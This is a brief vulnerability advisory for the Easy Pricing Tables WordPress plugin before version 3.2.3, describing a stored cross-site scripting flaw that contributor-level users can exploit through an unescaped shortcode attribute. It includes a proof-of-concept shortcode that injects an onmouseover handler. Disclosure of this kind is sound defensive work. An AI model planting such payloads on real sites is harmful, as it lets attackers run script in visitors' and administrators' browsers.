Pricing Tables WordPress Plugin – Easy Pricing Tables < 3.2.3 - Contributor+ Stored XSS via Shortcode

The plugin does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.

PoC

Note: Enable compatibility mode by going to the settings of the plugins. Exploit shortcode: [easy-pricing-toggle font_color=‘red; border:5px solid red;" onmouseover=“alert(1)”’ background_color=‘red’ border_color=‘red’ default_title=‘xss’ alternate_title=‘xss’ default_pricing_table_id=‘1’ alternate_pricing_table_id=‘2’]